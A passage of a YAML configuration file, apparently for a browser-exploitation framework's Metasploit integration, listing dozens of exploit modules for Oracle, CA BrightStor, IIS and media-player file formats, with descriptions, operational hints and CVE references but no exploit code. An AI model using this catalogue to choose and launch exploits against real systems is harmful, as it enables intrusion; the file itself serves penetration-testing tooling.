\t\t\t\tto the TNS service, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2002-0965
- - OSVDB
- "5041"
- - BID
- "4845"
- - URL
- http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml
- - URL
- http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf
path: extensions/metasploit/
class: Msf_module
msf_tns_auth_sesskey:
enable: true
msf: true
msf_key: windows/oracle/tns_auth_sesskey
name: Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Oracle. When\n\
\t\t\t\tsending a specially crafted packet containing a long AUTH_SESSKEY value\n\
\t\t\t\tto the TNS service, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1979
- - OSVDB
- "59110"
- - BID
- "36747"
- - URL
- http://blogs.conus.info/node/28
- - URL
- http://blogs.conus.info/node/35
- - URL
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html
path: extensions/metasploit/
class: Msf_module
msf_lgserver:
enable: true
msf: true
msf_key: windows/brightstor/lgserver
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n\
\t\t\t\toverflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0449
- - OSVDB
- "31593"
- - BID
- "22342"
path: extensions/metasploit/
class: Msf_module
msf_sql_agent:
enable: true
msf: true
msf_key: windows/brightstor/sql_agent
name: CA BrightStor Agent for Microsoft SQL Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\
\t\t\t\tAgent for Microsoft SQL Server. This vulnerability was\n\
\t\t\t\tdiscovered by cybertronic[at]gmx.net.\n\
\t\t\t"
authors:
- - CVE
- 2005-1272
- - OSVDB
- "18501"
- - BID
- "14453"
- - URL
- http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities
- - URL
- http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239
path: extensions/metasploit/
class: Msf_module
msf_lgserver_rxssetdatagrowthscheduleandfilter:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter
name: CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),\n\
\t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3216
- - OSVDB
- "35329"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_ca_arcserve_342:
enable: true
msf: true
msf_key: windows/brightstor/ca_arcserve_342
name: Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884).\n\
\t\t\t\tBy sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer\n\
\t\t\t\tand execute arbitrary code. In order to successfully exploit this vulnerability, you will need\n\
\t\t\t\tto set the hostname argument (HNAME).\n\
\t\t\t"
authors:
- - BID
- "31684"
- - OSVDB
- "49468"
- - CVE
- 2008-4397
- - URL
- http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html
path: extensions/metasploit/
class: Msf_module
msf_lgserver_multi:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_multi
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\n\
\t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3216
- - OSVDB
- "35329"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_message_engine_72:
enable: true
msf: true
msf_key: windows/brightstor/message_engine_72
name: CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\t11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n\
\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68329"
- - URL
- http://www.metasploit.com/users/mc
path: extensions/metasploit/
class: Msf_module
msf_tape_engine_8A:
enable: true
msf: true
msf_key: windows/brightstor/tape_engine_8A
name: CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tr11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n\
\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68330"
- - URL
- http://www.metasploit.com/users/mc
path: extensions/metasploit/
class: Msf_module
msf_hsmserver:
enable: true
msf: true
msf_key: windows/brightstor/hsmserver
name: CA BrightStor HSM Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM.\n\
\t\t\t\tBy sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5082
- - OSVDB
- "41363"
- - BID
- "25823"
path: extensions/metasploit/
class: Msf_module
msf_universal_agent:
enable: true
msf: true
msf_key: windows/brightstor/universal_agent
name: CA BrightStor Universal Agent Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a convoluted heap overflow in the CA\n\
\t\t\t\tBrightStor Universal Agent service. Triple userland\n\
\t\t\t\texception results in heap growth and execution of\n\
\t\t\t\tdereferenced function pointer at a specified address.\n\
\t\t\t"
authors:
- - CVE
- 2005-1018
- - OSVDB
- "15471"
- - BID
- "13102"
- - URL
- http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_lgserver_rxsuselicenseini:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_rxsuselicenseini
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an\n\
\t\t\t\tattacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3216
- - OSVDB
- "35329"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_license_gcr:
enable: true
msf: true
msf_key: windows/brightstor/license_gcr
name: CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.\n\
\t\t\t\tBy sending a specially crafted request to the lic98rmtd.exe service, an attacker\n\
\t\t\t\tcould overflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2005-0581
- - OSVDB
- "14389"
- - BID
- "12705"
path: extensions/metasploit/
class: Msf_module
msf_discovery_udp:
enable: true
msf: true
msf_key: windows/brightstor/discovery_udp
name: CA BrightStor Discovery Service Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\
\t\t\t\tDiscovery Service. This vulnerability occurs when a large\n\
\t\t\t\trequest is sent to UDP port 41524, triggering a stack buffer\n\
\t\t\t\toverflow.\n\
\t\t\t"
authors:
- - CVE
- 2005-0260
- - OSVDB
- "13613"
- - BID
- "12491"
- - URL
- http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_message_engine_heap:
enable: true
msf: true
msf_key: windows/brightstor/message_engine_heap
name: CA BrightStor ARCserve Message Engine Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\t11.5. By sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-5143
- - OSVDB
- "29533"
- - BID
- "20365"
path: extensions/metasploit/
class: Msf_module
msf_tape_engine:
enable: true
msf: true
msf_key: windows/brightstor/tape_engine
name: CA BrightStor ARCserve Tape Engine Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tr11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n\
\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6076
- - OSVDB
- "30637"
- - BID
- "21221"
- - URL
- http://www.milw0rm.com/exploits/3086
- - URL
- http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317
path: extensions/metasploit/
class: Msf_module
msf_etrust_itm_alert:
enable: true
msf: true
msf_key: windows/brightstor/etrust_itm_alert
name: Computer Associates Alert Notification Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1.\n\
\t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t\tIn order to successfully exploit this vulnerability, you will need valid logon credentials to the target.\n\
\t\t\t"
authors:
- - CVE
- 2007-4620
- - OSVDB
- "44040"
- - BID
- "28605"
path: extensions/metasploit/
class: Msf_module
msf_message_engine:
enable: true
msf: true
msf_key: windows/brightstor/message_engine
name: CA BrightStor ARCserve Message Engine Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\t11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n\
\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0169
- - OSVDB
- "31318"
- - BID
- "22005"
path: extensions/metasploit/
class: Msf_module
msf_mediasrv_sunrpc:
enable: true
msf: true
msf_key: windows/brightstor/mediasrv_sunrpc
name: CA BrightStor ArcServe Media Service Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit targets a stack buffer overflow in the MediaSrv RPC service of CA\n\
\t\t\t\tBrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker\n\
\t\t\t\tcan overflow a stack buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2139
- - OSVDB
- "35326"
- - BID
- "23635"
- - URL
- https://www.zerodayinitiative.com/advisories/ZDI-07-022.html
path: extensions/metasploit/
class: Msf_module
msf_discovery_tcp:
enable: true
msf: true
msf_key: windows/brightstor/discovery_tcp
name: CA BrightStor Discovery Service TCP Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\
\t\t\t\tDiscovery Service. This vulnerability occurs when a specific\n\
\t\t\t\ttype of request is sent to the TCP listener on port 41523.\n\
\t\t\t\tThis vulnerability was discovered by cybertronic[at]gmx.net\n\
\t\t\t\tand affects all known versions of the BrightStor product.\n\
\t\t\t\tThis module is based on the 'cabrightstor_disco' exploit by\n\
\t\t\t\tHD Moore.\n\
\t\t\t"
authors:
- - CVE
- 2005-2535
- - OSVDB
- "13814"
- - BID
- "12536"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html
- - URL
- http://milw0rm.com/exploits/1131
path: extensions/metasploit/
class: Msf_module
msf_lgserver_rxrlogin:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_rxrlogin
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n\
\t\t\t\toverflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5003
- - OSVDB
- "41353"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_ms01_023_printer:
enable: true
msf: true
msf_key: windows/iis/ms01_023_printer
name: Microsoft IIS 5.0 Printer Host Header Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the request processor of\n\
\t\t\t\tthe Internet Printing Protocol ISAPI module in IIS. This\n\
\t\t\t\tmodule works against Windows 2000 service pack 0 and 1. If\n\
\t\t\t\tthe service stops responding after a successful compromise,\n\
\t\t\t\trun the exploit a couple more times to completely kill the\n\
\t\t\t\thung process.\n\
\t\t\t"
authors:
- - CVE
- 2001-0241
- - OSVDB
- "3323"
- - BID
- "2674"
- - MSB
- MS01-023
- - URL
- http://seclists.org/lists/bugtraq/2001/May/0005.html
path: extensions/metasploit/
class: Msf_module
msf_ms02_018_htr:
enable: true
msf: true
msf_key: windows/iis/ms02_018_htr
name: Microsoft IIS 4.0 .HTR Path Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the ISAPI ISM.DLL used to\n\
\t\t\t\tprocess HTR scripting in IIS 4.0. This module works against\n\
\t\t\t\tWindows NT 4 Service Packs 3, 4, and 5. The server will\n\
\t\t\t\tcontinue to process requests until the payload being\n\
\t\t\t\texecuted has exited. If you've set EXITFUNC to 'seh', the\n\
\t\t\t\tserver will continue processing requests, but you will have\n\
\t\t\t\ttrouble terminating a bind shell. If you set EXITFUNC to\n\
\t\t\t\tthread, the server will crash upon exit of the bind shell.\n\
\t\t\t\tThe payload is alpha-numerically encoded without a NOP sled\n\
\t\t\t\tbecause otherwise the data gets mangled by the filters.\n\
\t\t\t"
authors:
- - CVE
- 1999-0874
- - OSVDB
- "3325"
- - BID
- "307"
- - URL
- http://www.eeye.com/html/research/advisories/AD19990608.html
- - MSB
- MS02-018
path: extensions/metasploit/
class: Msf_module
msf_ms01_033_idq:
enable: true
msf: true
msf_key: windows/iis/ms01_033_idq
name: Microsoft IIS 5.0 IDQ Path Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IDQ ISAPI handler for\n\
\t\t\t\tMicrosoft Index Server.\n\
\t\t\t"
authors:
- - CVE
- 2001-0500
- - OSVDB
- "568"
- - MSB
- MS01-033
- - BID
- "2880"
path: extensions/metasploit/
class: Msf_module
msf_iis_webdav_upload_asp:
enable: true
msf: true
msf_key: windows/iis/iis_webdav_upload_asp
name: Microsoft IIS WebDAV Write Access Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to execute a payload on IIS servers that\n\
\t\t\t\thave world-writeable directories. The payload is uploaded as an ASP\n\
\t\t\t\tscript using a WebDAV PUT request.\n\
\t\t\t"
authors:
- - OSVDB
- "397"
- - BID
- "12141"
path: extensions/metasploit/
class: Msf_module
msf_ms03_007_ntdll_webdav:
enable: true
msf: true
msf_key: windows/iis/ms03_007_ntdll_webdav
name: Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis exploits a buffer overflow in NTDLL.dll on Windows 2000\n\
\t\t\t\tthrough the SEARCH WebDAV method in IIS. This particular\n\
\t\t\t\tmodule only works against Windows 2000. It should have a\n\
\t\t\t\treasonable chance of success against any service pack.\n\
\t\t\t"
authors:
- - CVE
- 2003-0109
- - OSVDB
- "4467"
- - BID
- "7116"
- - MSB
- MS03-007
path: extensions/metasploit/
class: Msf_module
msf_ms01_026_dbldecode:
enable: true
msf: true
msf_key: windows/iis/ms01_026_dbldecode
name: Microsoft IIS/PWS CGI Filename Double Decode Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will execute an arbitrary payload on a Microsoft IIS installation\n\
\t\t\t\tthat is vulnerable to the CGI double-decode vulnerability of 2001.\n\n\
\t\t\t\tNOTE: This module will leave a metasploit payload in the IIS scripts directory.\n\
\t\t\t"
authors:
- - CVE
- 2001-0333
- - OSVDB
- "556"
- - BID
- "2708"
- - MSB
- MS01-026
- - URL
- http://marc.info/?l=bugtraq&m=98992056521300&w=2
path: extensions/metasploit/
class: Msf_module
msf_vuplayer_m3u:
enable: true
msf: true
msf_key: windows/fileformat/vuplayer_m3u
name: VUPlayer M3U Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack overflow in VUPlayer <= 2.49. When\n\
\t\t\t\t\tthe application is used to open a specially crafted m3u file, a buffer is overwritten allowing\n\
\t\t\t\t\tfor the execution of arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6251
- - OSVDB
- "31710"
path: extensions/metasploit/
class: Msf_module
msf_audio_wkstn_pls:
enable: true
msf: true
msf_key: windows/fileformat/audio_wkstn_pls
name: Audio Workstation 6.4.2.4.3 pls Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n\
\t\t\t\tWhen opening a malicious pls file with the Audio Workstation,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0476
- - OSVDB
- "55424"
- - URL
- http://www.exploit-db.com/exploits/10353
path: extensions/metasploit/
class: Msf_module
msf_galan_fileformat_bof:
enable: true
msf: true
msf_key: windows/fileformat/galan_fileformat_bof
name: gAlan 0.2.1 Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in gAlan 0.2.1.\n\
\t\t\tBy creating a specially crafted galan file, an attacker may be able\n\
\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "60897"
- - URL
- http://www.exploit-db.com/exploits/10339
path: extensions/metasploit/
class: Msf_module
msf_millenium_mp3_pls:
enable: true
msf: true
msf_key: windows/fileformat/millenium_mp3_pls
name: Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n\
\t\t\t\t\tAn attacker must send the file to the victim and the victim must open the file.\n\
\t\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\t\tPLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.\n\
\t\t\t\t\tThis functionality has not been tested in this module.\n\
\t\t\t"
authors:
- - OSVDB
- "56574"
- - URL
- http://www.exploit-db.com/exploits/9618
- - URL
- http://www.exploit-db.com/exploits/10240
path: extensions/metasploit/
class: Msf_module
msf_ca_cab:
enable: true
msf: true
msf_key: windows/fileformat/ca_cab
name: CA Antivirus Engine CAB Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n\
\t\t\t\t\tBy creating a specially crafted CAB file, an attacker may be able\n\
\t\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2864
- - OSVDB
- "35245"
- - BID
- "24330"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-07-035.html
path: extensions/metasploit/
class: Msf_module
msf_hhw_hhp_contentfile_bof:
enable: true
msf: true
msf_key: windows/fileformat/hhw_hhp_contentfile_bof
name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74.\n\
\t\t\t\t\tBy creating a specially crafted hhp file, an attacker may be able\n\
\t\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-0564
- - OSVDB
- "22941"
- - URL
- http://www.exploit-db.com/exploits/1470
- - URL
- http://www.exploit-db.com/exploits/1495
path: extensions/metasploit/
class: Msf_module
msf_ms09_067_excel_featheader:
enable: true
msf: true
msf_key: windows/fileformat/ms09_067_excel_featheader
name: Microsoft Excel Malformed FEATHEADER Record Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\t\tThis module exploits a vulnerability in the handling of the FEATHEADER record\n\
\t\t\t\t\tby Microsoft Excel. Revisions of Office XP and later prior to the release of the\n\
\t\t\t\t\tMS09-067 bulletin are vulnerable.\n\n\
\t\t\t\t\tWhen processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n\
\t\t\t\t\tstructure from the file to calculate a pointer offset without doing proper\n\
\t\t\t\t\tvalidation. Attacker supplied data is then used to calculate the location of an\n\
\t\t\t\t\tobject, and in turn a virtual function call. This results in arbitrary code\n\
\t\t\t\t\texecution.\n\n\
\t\t\t\t\tNOTE: On some versions of Office, the user will need to dismiss a warning dialog\n\
\t\t\t\t\tprior to the payload executing.\n\
\t\t\t\t"
authors:
- - CVE
- 2009-3129
- - OSVDB
- "59860"
- - MSB
- MS09-067
- - BID
- "36945"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-083/
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832
path: extensions/metasploit/
class: Msf_module
msf_a-pdf_wav_to_mp3:
enable: true
msf: true
msf_key: windows/fileformat/a-pdf_wav_to_mp3
name: A-PDF WAV to MP3 v1.0.0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n\
\t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "67241"
- - URL
- http://www.exploit-db.com/exploits/14676/
- - URL
- http://www.exploit-db.com/exploits/14681/
path: extensions/metasploit/
class: Msf_module
msf_emc_appextender_keyworks:
enable: true
msf: true
msf_key: windows/fileformat/emc_appextender_keyworks
name: EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control\n\
\t\t\t\t(KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's\n\
\t\t\t\tDocumentation ApplicationXtender 5.4.\n\
\t\t\t"
authors:
- - OSVDB
- "58423"
- - BID
- "36546"
path: extensions/metasploit/
class: Msf_module
msf_adobe_libtiff:
enable: true
msf: true
msf_key: windows/fileformat/adobe_libtiff
name: Adobe Acrobat Bundled LibTIFF Integer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n\
\t\t\t\tProfessional versions 8.0 through 8.2 and 9.0 through 9.3.\n\
\t\t\t"
authors:
- - CVE
- 2010-0188
- - BID
- "38195"
- - OSVDB
- "62526"
- - URL
- http://www.adobe.com/support/security/bulletins/apsb10-07.html
- - URL
- http://secunia.com/blog/76/
- - URL
- http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html
path: extensions/metasploit/
class: Msf_module
msf_proshow_cellimage_bof:
enable: true
msf: true
msf_key: windows/fileformat/proshow_cellimage_bof
name: ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n\
\t\t\t\tAn attacker must send the file to the victim and the victim must open the file.\n\
\t\t\t"
authors:
- - CVE
- 2009-3214
- - OSVDB
- "57226"
- - URL
- http://www.exploit-db.com/exploits/9483
- - URL
- http://www.exploit-db.com/exploits/9519
path: extensions/metasploit/
class: Msf_module
msf_etrust_pestscan:
enable: true
msf: true
msf_key: windows/fileformat/etrust_pestscan
name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in CA eTrust PestPatrol. When\n\
\t\t\t\tsending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4225
- - OSVDB
- "60862"
- - URL
- http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm
path: extensions/metasploit/
class: Msf_module
msf_safenet_softremote_groupname:
enable: true
msf: true
msf_key: windows/fileformat/safenet_softremote_groupname
name: SafeNet SoftRemote GROUPNAME Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in SafeNet SoftRemote\n\
\t\t\t\tSecurity Policy Editor <= 10.8.5. When an attacker\n\
\t\t\t\tcreates a specially formatted security policy with an\n\
\t\t\t\toverly long GROUPNAME argument, it is possible to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3861
- - OSVDB
- "59660"
- - URL
- http://www.senseofsecurity.com.au/advisories/SOS-09-008
path: extensions/metasploit/
class: Msf_module
msf_mjm_quickplayer_s3m:
enable: true
msf: true
msf_key: windows/fileformat/mjm_quickplayer_s3m
name: MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n\
\t\t\t\tand QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n\
\t\t\t\tone of these 2 applications, a stack buffer overflow can be triggered, resulting in\n\
\t\t\t\tarbitrary code execution.\n\n\
\t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.\n\
\t\t\t"
authors:
- - OSVDB
- "72102"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-003
path: extensions/metasploit/
class: Msf_module
msf_mini_stream:
enable: true
msf: true
msf_key: windows/fileformat/mini_stream
name: Mini-Stream 3.0.1.1 Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Mini-Stream 3.0.1.1.\n\
\t\t\t\tBy creating a specially crafted pls file, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "61341"
- - URL
- http://www.exploit-db.com/exploits/10745
path: extensions/metasploit/
class: Msf_module
msf_adobe_pdf_embedded_exe:
enable: true
msf: true
msf_key: windows/fileformat/adobe_pdf_embedded_exe
name: Adobe PDF Embedded EXE Social Engineering
category: Metasploit
description: "\n\
\t\t\t\t\tThis module embeds a Metasploit payload into an existing PDF file. The\n\
\t\t\t\tresulting PDF can be sent to a target as part of a social engineering attack.\n\
\t\t\t"
authors:
- - CVE
- 2010-1240
- - OSVDB
- "63667"
- - URL
- http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/
- - URL
- http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/
- - URL
- http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
path: extensions/metasploit/
class: Msf_module
msf_blazedvd_plf:
enable: true
msf: true
msf_key: windows/fileformat/blazedvd_plf
name: BlazeDVD 5.1 PLF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack overflow in BlazeDVD 5.1. When\n\
\t\t\t\t\tthe application is used to open a specially crafted plf file,\n\
\t\t\t\t\ta buffer is overwritten allowing for the execution of arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6199
- - OSVDB
- "30770"
- - BID
- "35918"
path: extensions/metasploit/
class: Msf_module
msf_fdm_torrent:
enable: true
msf: true
msf_key: windows/fileformat/fdm_torrent
name: Free Download Manager Torrent Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Free Download Manager\n\
\t\t\t\t3.0 Build 844. Arbitrary code execution could occur when parsing a\n\
\t\t\t\tspecially crafted torrent file.\n\
\t\t\t"
authors:
- - CVE
- 2009-0184
- - OSVDB
- "54033"
- - BID
- "33555"
- - URL
- http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18
- - URL
- http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18
- - URL
- http://secunia.com/secunia_research/2009-5/
- - URL
- http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl
path: extensions/metasploit/
class: Msf_module
msf_xion_m3u_sehbof:
enable: true
msf: true
msf_key: windows/fileformat/xion_m3u_sehbof
name: Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xion Audio Player prior to version\n\
\t\t\t\t1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n\
\t\t\t\tcontains an overly long string. This results in overwriting a\n\
\t\t\t\tstructured exception handler record.\n\
\t\t\t"
authors:
- - OSVDB
- "66912"
- - URL
- http://www.exploit-db.com/exploits/14517
- - URL
- http://www.exploit-db.com/exploits/14633
- - URL
- http://www.exploit-db.com/exploits/15598
path: extensions/metasploit/
class: Msf_module
msf_orbital_viewer_orb:
enable: true
msf: true
msf_key: windows/fileformat/orbital_viewer_orb
name: Orbital Viewer ORB File Parsing Buffer Overflow
category: Metasploit
description: "\n\
